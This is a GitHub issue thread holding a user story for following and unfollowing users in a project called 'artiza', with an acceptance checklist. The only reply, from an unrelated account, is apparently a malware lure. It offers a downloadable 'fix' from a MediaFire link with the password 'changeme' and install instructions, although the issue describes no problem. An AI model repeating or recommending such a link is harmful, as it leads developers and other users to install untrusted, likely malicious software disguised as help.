### ISSUE TITLE
USER STORY: Follow/Unfollow a user

### ISSUE THREAD

**Issue by Linnea87** [Linnea87/artiza#18]
As a **Site User** I can **follow and unfollow other users** so that **I can see and remove posts by specific users in my posts feed.**

Acceptance Criteria:

- As a user, I can see the follow/unfollow button.

Tasks:
 
- [x] Visible Follow/unfollow button for user only
- [x] Update button to reflect follow status
- [ ] 

Following:

- [ ] Number of people that the user is being followed by will increase
 - [x] Number of people that I am following will also increase

Unfollowing:
 - [x] Number of people that the user unfollowed by will decrease
 - [x] Number of people that I am unfollowing will also decrease

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
